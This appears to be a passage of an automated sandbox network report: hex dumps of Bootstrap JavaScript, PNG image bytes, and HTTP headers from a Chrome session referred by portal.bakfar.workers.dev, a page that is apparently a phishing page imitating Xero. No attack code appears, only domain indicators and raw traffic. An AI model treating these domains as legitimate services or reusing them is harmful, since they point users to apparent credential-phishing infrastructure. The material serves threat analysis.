                                                                      Data Ascii: guments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c 41 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 62 75
                                                                      Data Ascii: _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]',A='[data-toggle="bu
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 6d 2e 66 6e 5b 70 5d 2e 43 6f 6e
                                                                      Data Ascii: );var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryInterface,m.fn[p].Con
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 29 26 26 74 68 69 73 2e 6e 65 78 74 28 29 7d 2c 74 2e
                                                                      Data Ascii: lector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibility")&&this.next()},t.
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20
                                                                      Data Ascii: t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER,function(t){return
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c 73 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72
                                                                      Data Ascii: (this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,s=this._element.quer
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66 28 6e 26 26 50 28 6e 29 2e 68 61 73 43 6c 61 73 73 28 42 29
                                                                      Data Ascii: ing"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if(n&&P(n).hasClass(B)


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.449749199.115.115.1184434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:04 UTC579OUTGET /core/database/xero/css/hover.css HTTP/1.1
                                                                      Host: app.forexliteoptions.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: text/css,*/*;q=0.1
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: style
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:04 UTC338INHTTP/1.1 404 Not Found
                                                                      cache-control: max-age=0, private, must-revalidate
                                                                      connection: close
                                                                      content-length: 9
                                                                      date: Thu, 28 Mar 2024 23:21:03 GMT
                                                                      server: Cowboy
                                                                      set-cookie: sid=d8e87b72-ed59-11ee-9d96-dc41a6762102; path=/; domain=.forexliteoptions.com; expires=Wed, 16 Apr 2092 02:35:11 GMT; max-age=2147483647; secure; HttpOnly
                                                                      2024-03-28 23:21:04 UTC9INData Raw: 6e 6f 74 20 66 6f 75 6e 64
                                                                      Data Ascii: not found


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.449755104.18.24.1634434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:05 UTC616OUTGET /214d89a26f0ac918a09f216a1b0f97b4.png HTTP/1.1
                                                                      Host: i.gyazo.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:05 UTC574INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:05 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 372780
                                                                      Connection: close
                                                                      CF-Ray: 86bb5abf78579c46-IAD
                                                                      CF-Cache-Status: HIT
                                                                      Accept-Ranges: bytes
                                                                      Access-Control-Allow-Origin: https://gyazo.com
                                                                      Age: 877797
                                                                      Cache-Control: public, max-age=31536000
                                                                      ETag: "214d"
                                                                      Expires: Fri, 28 Mar 2025 23:21:05 GMT
                                                                      Set-Cookie: Gyazo_cfwoker=i; Secure; HttpOnly; SameSite=None; Expires=Tue, 01 Jan 2030 00:00:00 GMT
                                                                      Vary: Accept-Encoding
                                                                      Via: 1.1 google
                                                                      Access-Control-Allow-Credentials: true
                                                                      X-Cache-Level: ZS
                                                                      Server: cloudflare
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 e1 00 00 05 46 08 06 00 00 00 13 df e2 0e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 1d 86 00 00 1d 86 01 5d a2 13 81 00 00 ff a5 49 44 41 54 78 5e ec 9d 05 60 5c c7 d5 85 af c5 cc 60 59 16 98 99 99 19 92 98 12 87 99 b9 6d 9a 42 4a 69 53 6e 93 72 93 e6 0f 27 0e 33 38 64 88 99 99 19 84 b6 25 59 cc e8 7f ce d5 3e 7b bd 5e cb 92 2c cb 82 f3 a5 af d6 d2 db b7 6f 66 ee dc 99 39 73 6f 9b 5e 37 bc 78 4a 08 21 84 10 42 08 21 84 10 d2 2a 38 1c 3d 50 4a 3c 7c 6d 8f 48 63 b2 f7 81 00 09 f4 6c 63 7b 44 08 21 a4 25 f3 c7 79 5b 64 d9 d6 63 b6 47 84 10 42 08 21 84 10 42 08 69 e9 50 84 47 08 21 84 10 42 08 21 84 b4 22 4e 84 74 94 72 37 4f db
                                                                      Data Ascii: PNGIHDRFsRGBgAMAapHYs]IDATx^`\`YmBJiSnr'38d%Y>{^,of9so^7xJ!B!*8=PJ<|mHclc{D!%y[dcGB!BiPG!B!"Ntr7O
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: e1 21 e2 f7 b1 f4 02 39 90 94 2d c9 69 f9 52 51 51 29 01 7e 5e e2 eb ed a6 af 57 54 9e 52 3f b3 b8 b4 c2 f8 a0 ee d2 21 3a 48 7a 74 08 e1 a4 34 21 84 10 42 48 13 84 22 3c 42 08 21 a4 fe 50 84 d7 32 a0 08 8f 10 42 ce 40 11 1e 69 74 ee bb 7a 80 dc 3c ad a7 78 b9 bb c9 db 0b 76 cb 17 2b 0e 4a d2 89 5c db ab 2d 97 e8 08 7f b9 72 64 27 b9 65 7a 2f f3 a8 8d 7c b4 64 9f bc f4 e9 56 5d 84 bb 9c 74 6a 1f 24 37 4c ed 66 7b d4 f8 bc f6 c5 2e 15 b1 35 16 3f bb 6b a8 b8 b4 69 73 c1 09 32 44 35 ec dd 29 4c e2 db 05 48 58 90 b7 a6 18 f6 f0 70 d5 cf 02 a4 0b 2b 2d ab 94 a2 92 0a 39 9e 59 28 87 93 b2 e5 c8 b1 5c 7d ae a5 10 1b 1f ae 82 c5 da 92 78 34 dd f6 17 21 84 10 42 c8 a5 a3 39 8b f0 4a 8c af b8 3f 21 4b 36 ec 3e 21 95 55 55 1a 1d bc 53 fb 40 f1 f1 72 13 0f 37 57 7d
                                                                      Data Ascii: !9-iRQQ)~^WTR?!:Hzt4!BH"<B!P2B@itz<xv+J\-rd'ez/|dV]tj$7Lf{.5?kis2D5)LHXp+-9Y(\}x4!B9J?!K6>!UUS@r7W}
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: db 77 fc 8d e8 24 48 47 9b 9a 5e a0 f5 12 91 f1 f0 5b 5d da 88 b9 6f 85 8d ae aa be d4 78 fb 78 4a 58 78 80 8a ee 2a 2b 4f 49 56 66 be e4 64 17 4a 60 50 75 34 96 ba 88 f0 5c 5d 10 4d cf 4b 3c cd e0 ca c3 c3 4d ca cb 29 c4 23 a4 a1 19 d8 23 c2 f4 bb de 6a 7b 91 fa 1c 51 57 71 44 84 f8 4a 44 b0 b7 74 eb 10 2a 99 b9 25 92 65 8e a6 08 26 5f 3a 99 7e 08 62 13 88 b8 d3 b3 8a 2f 5a 84 17 1b 15 20 63 06 b4 d7 88 a7 c7 4e 36 6d 3b 8d 88 a1 61 a6 9c 20 0e 2f 32 fd e4 c1 e4 1c db 2b 67 d3 c1 bc de bb 73 98 b8 bb bb a8 a0 fe 44 e6 b9 b6 18 11 69 7b 76 0c 31 7d d7 29 1d 70 40 88 77 39 e8 db 25 5c 02 fd 3c e5 50 4a 0e 45 78 e4 a2 68 8e 22 3c a4 97 45 fb db 97 90 a5 6d 76 50 f7 08 71 81 d3 58 0b f0 3e 7f 5f 0f 15 d0 1e cf 28 32 76 dc 47 82 fc b9 4b fc 52 02 ff ff eb 55
                                                                      Data Ascii: w$HG^[]oxxJXx*+OIVfdJ`Pu4\]MK<M)##j{QWqDJDt*%e&_:~b/Z cN6m;a /2+gsDi{v1})p@w9%\<PJExh"<EmvPqX>_(2vGKRU
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: a6 0d 62 dc 31 b4 57 5b db b3 75 03 be 26 22 30 c3 a6 43 74 7b 39 77 8a c3 f7 3d 94 9c 23 1f 2c dc 27 69 59 45 3a 26 ef 1c 1b ac e3 29 4c 8e 94 95 57 49 ba 79 be bb e9 6b 9a e3 66 23 dc e3 83 49 d9 92 6f ec 69 17 f3 bb 20 66 ae ab 70 92 10 42 08 21 ad 03 46 c2 23 84 10 42 ea cf a5 8c 84 87 f5 b9 bd 47 33 65 c5 96 54 59 b1 35 45 fb 6c a4 71 44 44 a9 fd 89 59 ba b1 10 19 53 00 e6 57 0f a7 e6 e8 86 f6 c3 c9 d9 d2 b9 7d 90 78 78 5c de 80 30 8e 64 e4 14 cb 47 8b 0f 68 c4 39 ac 65 fb fb 7a 6a b4 b5 a6 00 ee 5f 73 8c 84 87 f5 61 a4 a6 6d e8 c3 2a 17 46 c2 23 e0 fa 29 dd 34 3a 9b 55 3f 02 7c ab 83 d2 60 bd c4 be de 9c ef d8 7e 20 43 37 66 0f eb 13 a5 42 b4 96 1e 09 0f 54 98 df 87 0c 59 98 8f 8d 0c f1 91 4e ed 03 f5 37 63 8e 1d ba 1c 7b b0 2e d6 2e dc 5f ae 18 19
                                                                      Data Ascii: b1W[u&"0Ct{9w=#,'iYE:&)LWIykf#Ioi fpB!F#BG3eTY5ElqDDYSW}xx\0dGh9ezj_sam*F#)4:U?|`~ C7fBTYN7c{.._
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 37 75 3f eb 64 9e 2a cf 1d b9 18 11 1e 40 dd af aa aa 12 2f 2f 0f 33 18 72 d5 4e 15 11 f1 9a 02 d7 4c ec a2 42 26 2c 28 d7 e5 80 03 d4 d8 6d 99 10 47 6a 12 e1 41 c0 31 bc 4f 3b e3 b0 bb c8 4a e3 4b 59 9b 18 e0 c8 8e ea 1f ad 51 9a 20 80 0b 33 8f 21 f4 82 b0 02 fe 50 61 51 99 46 eb b5 80 3d 45 34 bd 11 c6 f9 c7 84 09 a2 20 41 94 85 e8 6d e8 43 82 02 3c 55 10 06 a1 3a c4 6e 78 7d a4 f1 e1 10 51 16 a2 2f 1c 9d cc b9 21 ca c3 e0 01 11 dc ec ed f0 c8 be d1 3a 20 c6 80 03 1b 14 2c 26 0e 89 53 41 18 76 bc 60 a2 a4 7b 7c 88 46 b8 8b 6b 17 28 dd 30 99 12 e5 af e9 e1 d1 b7 c1 c6 43 fc 35 a0 7b a4 84 05 79 a9 53 ee 61 6c 4d 84 f1 1d 21 16 83 38 24 f1 44 5e 83 fa 8f 0d 05 ec 21 ae 17 76 05 e3 05 ec fc 29 29 ad 2e 2b f4 df b8 8f 28 cb 9d 07 ab 37 25 58 61 b6 8f 67 16
                                                                      Data Ascii: 7u?d*@//3rNLB&,(mGjA1O;JKYQ 3!PaQF=E4 AmC<U:nx}Q/!: ,&SAv`{|Fk(0C5{ySalM!8$D^!v)).+(7%Xag
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: fb 70 b9 c8 c9 2f 53 bb 01 7f 15 7e 6b 5d c4 76 e8 93 8e 68 3f 93 ac 36 04 36 0c 62 6b 1f 4f 77 9d 44 b1 07 d6 07 f7 0e fd ca c6 3d 27 64 cb de 34 d9 63 fa 26 d8 10 8c 5f 21 ec 35 e6 47 81 4d db 9b 90 ad fd 10 76 45 22 ad 0c d2 cc c0 c6 c1 cf 44 bf 81 09 50 74 89 d9 66 ac 8c fe 6c fd ee e3 7a 0d 88 48 0e ff cd cf 7c 3f 7e 13 ec 9e bd 08 0f d7 bc e3 c0 49 9d c8 c1 f9 93 8c 9d c3 b9 70 bd cd 55 68 48 08 21 84 90 86 81 22 3c 42 08 21 a4 fe 5c 2a 11 1e c6 fa c8 40 86 39 0b 6b 4e d3 1e 44 91 b3 04 78 e4 e2 69 ae 22 bc 2d fb d2 35 22 a2 33 10 50 69 dc a0 f6 aa ff c0 3c 24 e6 b5 21 ea 84 1e e5 d8 c9 42 29 ab 21 a8 0b 32 46 50 84 47 2c 2c 11 1e e6 22 a1 6f aa 2d 43 7a b5 6d f5 22 3c 00 fb 82 75 46 ac f5 21 12 68 5c db 40 db bf 01 ba 46 e6 e6 d6 46 56 6f 3f 2e db
                                                                      Data Ascii: p/S~k]vh?66bkOwD='d4c&_!5GMvE"DPtflzH|?~IpUhH!"<B!\*@9kNDxi"-5"3Pi<$!B)!2FPG,,"o-Czm"<uF!h\@FFVo?.
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: a2 c3 43 e1 60 e2 1e 85 85 85 cc 88 50 1f 15 fc 7d b2 f4 90 ec 30 af 63 b1 00 e7 80 08 ec 9a f1 9d 35 f4 21 16 b2 3f 5d 76 48 3f 83 c5 4c 44 d5 42 a4 17 44 7d 81 18 0e 95 02 11 ab 70 6e 2c 7a e2 fa b0 68 01 f1 1f 16 c2 b1 88 e2 98 82 cd 1e 44 b6 2b af ac 92 d5 db 8f c9 ba 9d 27 34 5a c0 f6 83 27 55 2c 17 17 55 2d d2 41 c7 8e 54 60 ed c2 aa 73 d5 e7 15 95 69 74 33 fb f4 91 88 62 83 68 28 09 a9 b9 ba c0 01 d5 ac 46 b1 31 1d 09 22 f4 ed 3b 9a a5 4e c2 8e 43 19 9a da 0c 8b ba dd 3b 84 a8 68 0f 8b 15 f5 11 2a dd 37 a7 bf fe be ff fb 64 cb 59 e5 62 81 74 b5 f5 89 64 81 32 38 72 2c c7 34 ac 04 db 33 75 63 d2 90 78 fd 5d 8b 37 24 e8 42 f1 f9 08 32 9d e8 a0 1e 6d 75 11 7c e9 e6 44 73 ff 53 65 f2 b0 0e 1a 4d e7 ef 6f af 37 8d 3d 41 0e a5 64 69 44 be 59 63 bb aa 33
                                                                      Data Ascii: C`P}0c5!?]vH?LDBD}pn,zhD+'4Z'U,U-AT`sit3bh(F1";NC;h*7dYbtd28r,43ucx]7$B2mu|DsSeMo7=AdiDYc3
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: b3 ea e7 ab df 83 e7 2f 74 6e 00 81 00 ae 05 22 ca da bc bf b1 71 33 4e 05 16 a2 ea 7b 34 e5 f4 4c b0 13 68 37 ce ae db fe f0 f6 ac fd 22 af bf af bb 3a b2 68 e7 8e 3b 51 6a 0b d2 3f 2f df 9c 22 7b 13 32 d5 de 4d 1e 1a ab 62 5d 38 c7 93 87 c6 68 34 4b d4 bd 05 6b 13 d4 fe 5c 2a e1 26 d2 d1 82 32 d8 8a 1a ea 26 a2 d8 e1 b8 58 e0 60 41 7c a7 22 c9 7a d8 9a 4b c9 f8 81 ed 55 d0 7d be be 05 0b b1 53 87 c5 d5 69 31 9d 90 c6 e2 df ef 6e 91 67 de dc 24 2f 7c b2 43 05 f6 de de 6e 3a 40 82 7d b3 c7 8a 52 36 7b 5c 27 79 e2 8e 21 e7 1c bd 3a 55 4f 3c 58 ed 00 ff 78 78 b8 6a ff 77 28 b5 e6 b4 e5 f8 04 da 36 44 61 77 cc ec 75 ce b9 af 99 d8 45 45 db 75 99 00 40 d4 a2 42 33 40 76 26 00 86 5d c4 d3 10 f5 d5 e5 9c f5 01 03 a8 9f dc 7e f6 ef b1 8e 3e 5d ce f8 7f f5 05 bf
                                                                      Data Ascii: /tn"q3N{4Lh7":h;Qj?/"{2Mb]8h4Kk\*&2&X`A|"zKU}Si1ng$/|Cn:@}R6{\'y!:UO<Xxxjw(6DawuEEu@B3@v&]~>]
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: cb 3c db f4 61 f0 d5 21 6a 76 bc 8f 6a fa 1c 9e c3 f5 44 85 fb e9 75 db 83 a8 86 f0 fb 9b f2 86 23 42 08 21 84 10 42 08 21 a4 35 83 6c 53 0f ce ed a7 82 37 cc a7 62 fd 7c de 97 7b 54 58 85 00 32 35 cd 71 5a 20 fb c8 ee a3 99 1a e5 0e 1b 23 7b 75 0a d3 b9 00 cc 87 60 1d 1d 99 b4 86 f5 6a 7b de b9 1a cc cb 77 88 0e 92 be 5d 22 74 1e 01 9f c3 e7 11 78 03 9b 0b 6b ca 92 57 57 10 bc 63 44 df 68 e9 68 be 0f 73 c2 d6 77 21 db 1b d6 ad 30 57 dd 94 d6 a1 9b 2a d8 dc f9 d9 d2 c3 f2 ce b7 fb ab b3 c1 d8 d7 13 f3 67 6e 7e 89 7c b0 f8 80 be 9e 8d 74 c7 ad f0 96 22 ad b2 b3 f5 f4 fa 1e a8 bb 84 9c 0f d8 57 cc 39 4f 1b 11 57 9d f9 c9 b4 d1 af 56 1d 95 b7 4d 1b 44 40 31 cc df ce 1c d3 51 33 40 35 15 7d 41 b3 52 0a 60 c7 3c 52 c7 62 41 62 e2 90 18 79 60 6e 5f 79 f4 fa fe
                                                                      Data Ascii: <a!jvjDu#B!B!5lS7b|{TX25qZ #{u`j{w]"txkWWcDhhsw!0W*gn~|t"W9OWVMD@1Q3@5}AR`<RbAby`n_y
                                                                      2024-03-28 23:21:05 UTC1369INData Raw: 30 fe 06 7c 34 44 db b5 fc 16 0b 38 ba d1 11 7e 3a 01 81 41 2b 7c b4 d0 20 6f fd 4e c7 49 09 44 78 6b 1f e9 af 51 de 6a 0b 42 c2 23 9a 12 1c 70 fb c1 47 b8 b9 4e 44 af f4 36 e7 84 c0 c5 7e 27 a1 f6 e3 a6 8d c2 9f 74 e6 13 36 55 e0 7f 21 ba 2a 76 46 b6 c5 80 cb f4 35 98 a0 49 77 88 b4 87 d7 d3 4c 1f 04 0f 38 26 c2 5f a3 41 a5 65 15 a9 6d b2 48 3e 91 af 1b 36 b0 13 b4 b3 f1 31 51 4e f6 e0 fe e9 40 c5 cb 4d 77 87 d6 36 5d 26 d2 db e2 3a b1 23 34 c6 0c 08 e1 07 5b c0 4e 62 23 09 76 7b 36 9f bb 4e 48 c3 82 f1 1e da df 8a ad 29 3a fe 41 84 73 4c 02 77 6a 1f a8 02 da 15 5b 52 65 fe 8a c3 1a e9 ed 6b 44 2d dd 97 66 6c 9b 8b 0c ea 1e 29 d3 47 74 90 fe dd c2 75 5c d7 d4 81 3d c6 b5 0e eb 15 a5 e3 da bd 66 8c 09 d7 08 26 01 1b 1a 30 46 1f d5 2f 5a 85 7a ce 8e c9 c3
                                                                      Data Ascii: 0|4D8~:A+| oNIDxkQjB#pGND6~'t6U!*vF5IwL8&_AemH>61QN@Mw6]&:#4[Nb#v{6NH):AsLwj[RekD-fl)Gtu\=f&0F/Zz


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.449736172.67.154.1374434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:05 UTC606OUTGET /favicon.ico HTTP/1.1
                                                                      Host: portal.bakfar.workers.dev
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:05 UTC556INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:05 GMT
                                                                      Content-Type: text/html;charset=UTF-8
                                                                      Content-Length: 15616
                                                                      Connection: close
